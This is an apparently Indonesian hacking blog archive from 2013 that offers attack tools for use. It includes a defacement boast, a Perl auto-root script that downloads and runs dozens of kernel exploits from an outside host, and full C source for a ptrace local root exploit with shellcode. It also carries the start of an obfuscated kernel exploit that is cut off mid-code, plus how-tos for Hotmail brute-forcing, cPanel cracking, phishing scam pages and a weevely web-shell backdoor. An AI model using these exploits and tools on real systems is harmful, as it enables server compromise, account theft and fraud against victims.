Home » Archives for 2013

Google.com.my Hacked By 1337 (Madleets hacker Team)

Posted by Yas Thursday 10 October 2013 0 comments
Google hacked By Palestani hacker (1337)
Site Hacked :
 www.google.com.my
 www.google.my
 mirror
 http://www.zone-h.com/mirror/id/20957809
 http://www.zone-h.com/mirror/id/20957806
 Screenshot :
   
Video :
 http://www.youtube.com/watch?v=OYUR19t6jt8




[!] Struck by 1337

Google Malaysia STAMPED by PAKISTANI LEETS

We are TeaM MADLEETS

H4x0r HuSY - KhantastiC HaXor - H4x0rL1f3 - InvectuS - Shadow008 - r00x - Don - MindCracker - Dr.Z0mbie - phpBuGz - MaD GirL
MaDCoDe - Sn!p3r_GS - DeXter - Neo Haxor - Darksnipper - Pain006 - b0x - R3DL0F - Sahrawi - 3thicaln00b - Hmei7 - MakMan - Sniffer - AL.MaX HaCkEr - Ch3rn0by1
=======================
www.MaDLeeTs.com
| LeeTHaXor@Y7mail.com |
=======================
Pakistan Zindabad

Cheap Webhosting / Webhosting Murah

Posted by Yas Friday 14 June 2013 0 comments
Fast Net Host

====================
*Account Features*
====================
- RVSkin
- Softaculous Premium
- Attracta (SEO/SEM)
- PHP 5.3.X
- MySQL 5
- Free Transfer
- 99.9% Uptime guarantee
- Nginx
- CloudFlare
- FFmpeg
- WHMXtra

Klik Here




»»»»»»
Starter
»»»»»»

»1 Addon Domains
»Unlimited Disk Space
»Unlimited Bandwidth
»5 Databases
»Unlimited Email
»Unlimited Sub-domain
»Attracta
»WHMXtra
»Softaculous
»99.99% Uptime Guarantee
»PHP, CGI, Perl, JavaScript, SSI & MySQL Support
1 month payment - $ 3.95
Order Now


»»»»»»
Proffesional
»»»»»»

»10 Addon Domains
»UNlimited Gb Disk Space
»Unlimited Bandwidth
»20 Databases
»Unlimited Email
»Unlimited Sub-domain
»Attracta
»WHMXtra
»Softaculous
»99.99% Uptime Guarantee
»PHP, CGI, Perl, JavaScript, SSI & MySQL Support
1 month payment - $ 6.95
Order Now




»»»»»»
CORPORATE
»»»»»»

»Unlimited Addon Domains
»UNlimited Gb Disk Space
»Unlimited Bandwidth
»Unlimited Databases
»Unlimited Email
»Unlimited Sub-domain
»Attracta
»WHMXtra
»Softaculous
»99.99% Uptime Guarantee
»PHP, CGI, Perl, JavaScript, SSI & MySQL Support
1 month payment - $ 9.95
Order Now

Auto Root linux server 2010-2011-2012

Posted by Yas Thursday 4 April 2013 0 comments





#!/usr/bin/perl

print "######################################################\n";
print "# Auto Rooting ******* For Linux #\n";
print "# Margu Local Root 2011 2012 For Linux #\n";
print "# Version: 1.0 #\n";
print "######################################################\n";
{
system("uname -a");
system("wget http://www.oco.cc/root/1-2");
system("chmod 777 1-2");
system("./1-2");
system("id");
system("wget http://www.oco.cc/root/1-3");
system("chmod 777 1-3");
system("./1-3");
system("id");
system("wget http://www.oco.cc/root/1-4");
system("chmod 777 1-4");
system("./1-4");
system("id");
system("wget http://www.oco.cc/root/2");
system("chmod 777 2");
system("./2");
system("id");
system("wget http://www.oco.cc/root/2-1");
system("chmod 777 2-1");
system("./2-1");
system("id");
system("wget http://www.oco.cc/root/2-6-32-46-2011");
system("chmod 777 2-6-32-46-2011");
system("./2-6-32-46-2011");
system("id");
system("wget http://www.oco.cc/root/2-6-37");
system("chmod 777 2-6-37");
system("./2-6-37");
system("id");
system("wget http://www.oco.cc/root/2.6.18-6-x86-2011");
system("chmod 777 2.6.18-6-x86-2011");
system("./2.6.18-6-x86-2011");
system("id");
system("wget http://www.oco.cc/root/2.6.18-164-2010");
system("chmod 777 2.6.18-164-2010");
system("./2.6.18-164-2010");
system("id");
system("wget http://www.oco.cc/root/2.6.18-194");
system("chmod 777 2.6.18-194");
system("./2.6.18-194");
system("id");
system("wget http://www.oco.cc/root/2.6.18-194.1-2010");
system("chmod 777 2.6.18-194.1-2010");
system("./2.6.18-194.1-2010");
system("id");
system("wget http://www.oco.cc/root/acid");
system("chmod 777 acid");
system("./acid");
system("id");
system("wget http://www.oco.cc/root/2.6.18-194.2-2010");
system("chmod 777 2.6.18-194.2-2010");
system("./2=2.6.18-194.2-2010");
system("id");
system("wget http://www.oco.cc/root/2.6.18-274-2011");
system("chmod 777 2.6.18-274-2011");
system("./2.6.18-274-2011");
system("id");
system("wget http://www.oco.cc/root/2.6.18-374.12.1.el5-2012");
system("chmod 777 2.6.18-374.12.1.el5-2012");
system("./2.6.18-374.12.1.el5-2012");
system("id");
system("wget http://www.oco.cc/root/2.6.28-2011");
system("chmod 777 2.6.28-2011");
system("./2.6.28-2011");
system("id");
system("wget http://www.oco.cc/root/2.6.32-46.1.BHsmp");
system("chmod 777 2.6.32-46.1.BHsmp");
system("./2.6.32-46.1.BHsmp");
system("id");
system("wget http://www.oco.cc/root/2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://www.oco.cc/root/2.6.33-2011");
system("chmod 777 2.6.33-2011");
system("./2.6.33-2011");
system("id");
system("wget http://www.oco.cc/root/2.6.34-2011Exploit1");
system("chmod 777 2.6.34-2011Exploit1");
system("./2.6.34-2011Exploit1");
system("id");
system("wget http://www.oco.cc/root/2.6.34-2011Exploit2");
system("chmod 777 2.6.34-2011Exploit2");
system("./2.6.34-2011Exploit2");
system("id");
system("wget http://www.oco.cc/root/2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://www.oco.cc/root/2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://www.oco.cc/root/2.34-2011Exploit1");
system("chmod 777 2.34-2011Exploit1");
system("./2.34-2011Exploit1");
system("id");
system("wget http://www.oco.cc/root/3");
system("chmod 777 3");
system("./3");
system("id");
system("wget http://www.oco.cc/root/4");
system("chmod 777 4");
system("./4");
system("id");
system("wget http://www.oco.cc/root/5");
system("chmod 777 5");
system("./5");
system("id");
system("wget http://www.oco.cc/root/6");
system("chmod 777 6");
system("./6");
system("id");
system("wget http://www.oco.cc/root/7");
system("chmod 777 7");
system("./7");
system("id");
system("wget http://www.oco.cc/root/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
system("wget http://www.oco.cc/root/7x");
system("chmod 777 7x");
system("./7x");
system("id");
system("wget http://www.oco.cc/root/8");
system("chmod 777 8");
system("./8");
system("id");
system("wget http://www.oco.cc/root/9");
system("chmod 777 9");
system("./9");
system("id");
system("wget http://www.oco.cc/root/10");
system("chmod 777 10");
system("./10");
system("id");
system("wget http://www.oco.cc/root/11");
system("chmod 777 11");
system("./11");
system("id");
system("wget http://www.oco.cc/root/13x");
system("chmod 777 13x");
system("./13x");
system("id");
system("wget http://www.oco.cc/root/14");
system("chmod 777 14");
system("./14");
system("id");
system("wget http://www.oco.cc/root/15.sh");
system("chmod 777 15.sh");
system("./15.sh");
system("id");
system("wget http://www.oco.cc/root/16");
system("chmod 777 16");
system("./16");
system("id");
system("wget http://www.oco.cc/root/16-1");
system("chmod 777 16-1");
system("./16-1");
system("id");
system("wget http://www.oco.cc/root/18");
system("chmod 777 18");
system("./18");
system("id");
system("wget http://www.oco.cc/root/18-5");
system("chmod 777 18-5");
system("./18-5");
system("id");
system("wget http://www.oco.cc/root/31");
system("chmod 777 31");
system("./31");
system("id");
system("wget http://www.oco.cc/root/36-rc1");
system("chmod 777 36-rc1");
system("./36-rc1");
system("id");
system("wget http://www.oco.cc/root/44");
system("chmod 777 44");
system("./44");
system("id");
system("wget http://www.oco.cc/root/15150");
system("chmod 777 15150");
system("./15150");
system("id");
system("wget http://www.oco.cc/root/15200");
system("chmod 777 15200");
system("./15200");
system("id");
system("wget http://www.oco.cc/root/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
system("wget http://www.oco.cc/root/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
system("wget http://www.oco.cc/root/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
system("wget http://www.oco.cc/root/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id");
system("wget http://www.oco.cc/root/full-nelson");
system("chmod 777 full-nelson");
system("./full-nelson");
system("id");
system("wget http://www.oco.cc/root/gayros");
system("chmod 777 gayros");
system("./gayros");
system("id");
system("wget http://www.oco.cc/root/lenis.sh");
system("chmod 777 lenis.sh");
system("./lenis.sh");
system("id");
system("wget http://www.oco.cc/root/local-root-exploit-gayros");
system("chmod 777 local-root-exploit-gayros");
system("./local-root-exploit-gayros");
system("id");
system("wget http://www.oco.cc/root/pwnkernel");
system("chmod 777 pwnkernel");
system("./pwnkernel");
system("id");
system("wget http://www.oco.cc/root/root1");
system("chmod 777 root1");
system("./root1");
system("id");
system("wget http://www.oco.cc/root/root.py");
system("chmod 777 root.py");
system("./root.py");
system("id");
system("wget http://www.oco.cc/root/runx");
system("chmod 777 runx");
system("./runx");
system("id");
system("wget http://www.oco.cc/root/tivoli");
system("chmod 777 tivoli");
system("./tivoli");
system("id");
system("wget http://www.oco.cc/root/ubuntu");
system("chmod 777 ubuntu");
system("./ubuntu");
system("id");
system("wget http://www.oco.cc/root/vmsplice-local-root-exploit");
system("chmod 777 vmsplice-local-root-exploit");
system("./z1d-2011");
system("id");
system("wget http://www.oco.cc/root/z1d-2011");
system("chmod 777 z1d-2011");
system("./z1d-2011");
system("id");
system("whoami");
system("rm 1-2");
system("rm 1-3");
system("rm 1-4");
system("rm 2");
system("rm 2-1");
system("rm 2-6-32-46-2011");
system("rm 2-6-37");
system("rm 2.6.18-6-x86-2011");
system("rm 2.6.18-164-2010");
system("rm 2.6.18-194");
system("rm 2.6.18-194.1-2010");
system("rm acid");
system("rm 2.6.18-194.2-2010");
system("rm 2.6.18-274-2011");
system("rm 2.6.18-374.12.1.el5-2012");
system("rm 2.6.28-2011");
system("rm 2.6.32-46.1.BHsmp");
system("rm 2.6.33");
system("rm 2.6.33-2011");
system("rm 2.6.34-2011Exploit1");
system("rm 2.6.34-2011Exploit2");
system("rm 2.6.37");
system("rm 2.6.37-rc2");
system("rm 2.34-2011Exploit1");
system("rm 3");
system("rm 4");
system("rm 5");
system("rm 6");
system("rm 7");
system("rm 7-2");
system("rm 7x");
system("rm 8");
system("rm 9");
system("rm 10");
system("rm 11");
system("rm 13x");
system("rm 14");
system("rm 15.sh");
system("rm 16");
system("rm 16-1");
system("rm 18");
system("rm 18-5");
system("rm 31");
system("rm 36-rc1");
system("rm 44");
system("rm 15150");
system("rm 15200");
system("rm exp1");
system("rm exp2");
system("rm exp3");
system("rm exploit");
system("rm full-nelson");
system("rm gayros");
system("rm lenis.sh");
system("rm local-root-exploit-gayros");
system("rm pwnkernel");
system("rm root1");
system("rm root.py");
system("rm runx");
system("rm tivoli");
system("rm ubuntu");
system("rm vmsplice-local-root-exploit");
system("rm z1d-2011");
system("rm exploit.conf");
system("rm a.c");
print "######################################################\n";
print "# Auto Rooting ******* For Linux #\n";
print "# Margu Local Root 2011 2012 For Linux #\n";
print "# Version: 1.0 #\n";
print "######################################################\n";
print "                     :) \n";
}

Metasploit Portable v2

Posted by Yas Sunday 17 March 2013 3 comments



+ -- --=[ MSF 3.2 Portable v2
      
[*]Changelog/Features:
   [+]Best pack and unpack
   [+]Command line support
   [+]GTK Theme selector
   [+]Links to use extra tools
   [+]Use only Console
   [+]Build a updated and config version
   [-]Encrypt all files

 [*]Command line:
   /update   -> Update MSF Core
   /tools    -> Add extra tools to desktop
   /themes   -> Execute GTK theme selector
   /gui      -> Run GUI
   /web      -> Run Web
   /konsole  -> Run Console
   /build    -> Build a update
   /S        -> Silent

   usage:
   MSF 3.2p v2 Full.exe /update /gui /build /S
   MSF 3.2p v2 Full.exe /update /build /S
   MSF 3.2p v2 Full.exe /konsole /S
   etc....!

 [*]Versions:
   MSF 3.2p v2      -> Web and GUI
   MSF 3.2p v2 Full   -> Web, GUI and Console
   MSF 3.2p v2 Lite   -> Console

 [*]Extra tools:
   Putty
   VNCViewer
   WinVI
   RUBY Shell
   NASM Shell
   Netcat
   Cygwin   
Download : here


PERL scripts mega Collections For Hacking

Posted by Yas Saturday 2 March 2013 0 comments

List :

 1. GMail brute
2. BtTel Telnet BruteForce
3. BruteMSN
4. BruteFTP brftp by m0x.lk
5. PHP-Shells finder
6. VNC Vuln Scanner
7. JoMo-Kun Parallel NMAP Scanner
8. DMZScan - Simple Connect Port Scanner using PERL
9. R-Trojan Scanner 1.0
10. Database extractor
11. Nepokatneza GUI Edition 1.6
12. Directory spider
13. B0ffuzzer v1.0
14. PRIVACY_SPYER / DR. GREENTHUMB
15. Milw0rm New Exploits Checker
16. FTP scanner by softxor
17. PHP Injection Scanner
18. SatanBot
19. MassDefacer
20. Email Extractor
21. Crypt This Shit
22. netBRUTE
23. Email grabber
24. MD5 Lookup
25. Google dorkizzler
26. Simple phpBB version checker
27. Simple IRC Bot.
28. PHP injection scanner
29. A utility to parse the BIOS PCI IRQ Routing Table
30. MSSQL Record Dumper 0.1.1 Alpha
31. Stealth ShellBot Vers?o 0.2
32. Web Clickers
33. Windows / Linux mass defacer script
34. LogCleaner (beta)
35. All In One Exploit
36. MD5 Bruteforce
37. Site Lister
38. Simple mail grabber
39. ARP dos, makes the target windows pc unusable for the duration of the attack
40. DNS Scanner
41. Creates a wordlist for brute forcing.
42. Decrypt DES with a wordlist
43. Denial of Service script
44. Leech imageshack images
45. MD5 cracker uses wordlist
46. Checks http server given site is running
47. Very small port scanner
48. Enumerates directorys / users on a webserver.
49. Simple Shellcode Generator
50. TCP/UDP Flooder
51. BR00TALL - Password Hash Brute-Forcer
52. Proxy Scanner
53. ConnectBackShell
54. Skype Bruteforcer
55. Force & fast check ports
56. bluetooth hacking tool
57. SQL insertion crawler
58. binary scanner
59. POP3 Crack (bruteforce)
60. openpgp vanity key generator
61. MD5 Hash Bruteforce Kit
62. Brute force for Oracle databases.
63. MD5 cracker irc-bot
64. Freewebs Shout box flooder
65. Distributed reflection denial of service program
66. shellcode generator
67. General RFI Scanner
68. MD5 Hash matcher
69. Perl ebay login
7o. Bind Port
71. Another Irc-bot
72. Scanner for eNdonesia 8.4 Multiple Vulner
73. gQuery Script (Command-Line Google Query Script)
74. simple milw0rm rss news graber
75. Google Search Tool
76. HTTP-GET Request Generator
77. Random Password Generator
78. Flexible Random Password Generation
79. AIM grabs a users online status
80. Simple Webserver Scanner
81. Botsniffer
82. Reverse IP script.
83. Cpanel Brute forcer
84. Extracts and cracks hashes of a given MySQL dump of a vBulletin board
85. VulnScan v9
86. IRC Spam bot
87. Simple IP 2 Hex script
88. perl proxy list checker
89. PerlBot
90. A simple irc bot
91. Perl direct SOCKS server's list checker
92. Perl/Tk TCP Port Scanner
93. simple irc bot for the remote control of Windows based systems
94. Script uses smbclient to fetch files from win null shares.
95. A simple proxy checker
96. Perl Connect Back Backdoor
97. log eraser MSRLE v0.1
98. CPanel exploit checker
99. Scan a host for rfi vulnz
100. Banner Grabber(mass hosts)
101. cold fusion/ws_ftp.ini password decryption/encryption
102. ConnectBack Backdoor Shell vs 1.0
103. Dictionary Maker
104. CGI scanner
105. connect and send commands to remote iport. the tor network is used for anonymity.
106. port scanner sweeper.
107. rfi scaner. Includes ddb grabber, rfi expl0iter, error_reporting(0) bypass.
108. Log all IP's of visiors
109. Directory revealer
110. IIS Scanner 2012
111. UDP Flooder
112. MD5 Cracker
113. MD5::Reverse
114. wordlist tool by mousepad

Download : Here

Hotmail Crack

Posted by Yas Friday 22 February 2013 0 comments

Download filenya : Disini
cara pakai :
buka CMD lalu ketik perintah berikut :

cd /hotmail 

 hotmail.py -u victim@hotmail.com -w hotmail.txt

 *hotmail.txt = password list


ENJOY IT 



XCodeXploitScanner SQL,XSS,RFI,LFI

Posted by Yas 0 comments



Status: Clean.
Total Results: 0/35
AVG Free- Clean.
ArcaVir-Clean.
Avast 5-Clean.
AntiVir (Avira)- Clean.
BitDefender- Clean.
VirusBuster Internet Security- Clean.
Clam Antivirus- Clean.
COMODO Internet Security- Clean.
Dr.Web- Clean.
eTrust-Vet- Clean.
F-PROT Antivirus- Clean.
F-Secure Internet Security- Clean.
G Data- Clean.
IKARUS Security- Clean..
Kaspersky Antivirus-Clean.
McAfee-Clean.
MS Security Essentials- Clean.
ESET NOD32- Clean.
Norman- Clean.
Norton Antivirus-Clean.
Panda Security-Clean.
A-Squared- Clean.
Quick Heal Antivirus- Clean.
Solo Antivirus-Clean.
Sophos-Clean.
Trend Micro Internet Security-Clean.
VBA32 Antivirus- Clean.
Vexira Antivirus-Clean.
Zoner AntiVirus-Clean.
Ad-Aware-Clean.
BullGuard- Clean.
Immunet Antivirus- Clean.
K7 Ultimate- Clean.
NANO Antivirus- Clean.
VIPRE-Clean.


Download Link => Xcode




[ PRIVATE ] CPANEL CRACKER 2013

Posted by Yas 2 comments
oke, kali ini saya akan berbagi TUT cpanel cracker, 100% work
pertama download tools ini => DISINI
(pastikan anda sudah menginstall tool python)

rar pass = www.ilyas-cyber4rt.com
Ikuti lagkah langkah berikut :
* Upload killer.php
* Upload cp.php
*buka killer.php (liat gambar)

                 





 * simpan cp.py di local disk c :
 * buka cmd, dan ketik perintah
    - cd \
    - cp.py [URL CONFIG] c:[folder data penyimpanan config] (liat gambar)
   



* Copy semua password list yg dilayar cmd anda
* Buka cp.php
* Lalu paste password listnya, dan klik start (liat gambar)




                                         

DONE !!
  SEMOGA BERMANFAAT !! :)

All Scam Pages(PayPal , Skype ,Ebay , Facebook,Gmail ,Yahoo Etc

Posted by Yas Tuesday 12 February 2013 1 comment
screenshot :




Silahkan disedot gan, mumpung masih hangat  :D
download  here

ENJOY !!



cara mudah backconnect

Posted by Yas Sunday 3 February 2013 0 comments
pertama download tools ini :

 weevely  :
donlot disini
python :
donlot disini
python read line :
donlot disini :) 

  extract weevely di (local dick: c )

 buka cmd lalu ketik perintah berikut :
main.py -g -o namashell.php -p password
contoh : main.py -g -o x.php -p ilyas



                                          





lalu upload shell yg dibuat tadi ke web anda 

                                                                                                

                                     


sekarang ketik perintah berikut :
main.py -t -u http://target.com/x.php -p ilyas





                                     



SEMOGA BERMANFAAT :)

WHOAMI ?

Posted by Yas Saturday 19 January 2013 0 comments
WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ? WHOAMI ?

Linux Kernel 2.2.x - 2.4.x ptrace/kmod Local Root Exploit

Posted by Yas Tuesday 15 January 2013 0 comments

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

char cliphcode[] =
    "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
    "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
    "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
    "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
    "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile int gotchild = 0;

void fatal(char * msg)
{
    perror(msg);
    kill(parent, SIGKILL);
    kill(child, SIGKILL);
    kill(victim, SIGKILL);
}

void putcode(unsigned long * dst)
{
    char buf[MAXPATHLEN + CODE_SIZE];
    unsigned long * src;
    int i, len;

    memcpy(buf, cliphcode, CODE_SIZE);
    len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
    if (len == -1)
        fatal("[-] Unable to read /proc/self/exe");

    len += CODE_SIZE + 1;
    buf[len] = '\0';
     
    src = (unsigned long*) buf;
    for (i = 0; i < len; i += 4)
        if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
            fatal("[-] Unable to write shellcode");
}

void sigchld(int signo)
{
    struct user_regs_struct regs;

    if (gotchild++ == 0)
        return;
     
    fprintf(stderr, "[+] Signal caught\n");

    if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
        fatal("[-] Unable to read registers");
     
    fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);
     
    putcode((unsigned long *)regs.eip);

    fprintf(stderr, "[+] Now wait for suid shell...\n");

    if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
        fatal("[-] Unable to detach from victim");

    exit(0);
}

void sigalrm(int signo)
{
    errno = ECANCELED;
    fatal("[-] Fatal error");
}

void do_child(void)
{
    int err;

    child = getpid();
    victim = child + 1;

    signal(SIGCHLD, sigchld);

    do
        err = ptrace(PTRACE_ATTACH, victim, 0, 0);
    while (err == -1 && errno == ESRCH);

    if (err == -1)
        fatal("[-] Unable to attach");

    fprintf(stderr, "[+] Attached to %d\n", victim);
    while (!gotchild) ;
    if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
        fatal("[-] Unable to setup syscall trace");
    fprintf(stderr, "[+] Waiting for signal\n");

    for(;;);
}

void do_parent(char * progname)
{
    struct stat st;
    int err;
    errno = 0;
    socket(AF_SECURITY, SOCK_STREAM, 1);
    do {
        err = stat(progname, &st);
    } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);
     
    if (err == -1)
        fatal("[-] Unable to stat myself");

    alarm(0);
    system(progname);
}

void prepare(void)
{
    if (geteuid() == 0) {
        initgroups("root", 0);
        setgid(0);
        setuid(0);
        execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
        fatal("[-] Unable to spawn shell");
    }
}

int main(int argc, char ** argv)
{
    prepare();
    signal(SIGALRM, sigalrm);
    alarm(10);
     
    parent = getpid();
    child = fork();
    victim = child + 1;
     
    if (child == -1)
        fatal("[-] Unable to fork");

    if (child == 0)
        do_child();
    else
        do_parent(argv[0]);

    return 0;
}

linux kernel 2.6.18-194 & 2.6.18-294 2010 exploit

Posted by Yas 0 comments

#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h> 
#include <sys/msg.h>
#include <errno.h>
#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!#@#"
#else
#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy

 #define VERT                  "\033[32m"
#define NORM                  "\033[0m"
#define BANNER                VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n"

 #define KALLSYMS              "/proc/kallsyms"
#define TMAGIC_66TDFDRTS      "/proc/timer_list"
#define SELINUX_PATH          "/selinux/enforce"
#define RW_FOPS               "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD  "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD  "revert_creds"
#define Y0Y0SMAP              0x100000UL
#define Y0Y0CMAP              0x200000UL
#define Y0Y0STOP              (Y0Y0SMAP+0xFFC)
#define J0J0S                 0x00200000UL
#define J0J0R00T              0x002000F0UL
#define PAGE_SIZE             0x1000

 #define KERN_DHHDYTMLADSFPYT     0x1
#define KERN_DGGDYDTEGGETFDRLAK  0x2
#define KERN_HHSYPPLORQTWGFD     0x4 
#define KERN_DIS_GGDYYTDFFACVFD_IDT      0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS     0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM      0x20

 #define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX  0x40

 #define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))

 #define TRY_REMAP_DEFAULT 1

 #define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

 static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=0, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];

 #define R0C_0FF 14
static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"  
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"   
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"     
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"                   
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";               
#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"                                 
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"  
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"                              
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"   
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";                                       
#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                      
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";
/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"      
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"                                  
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
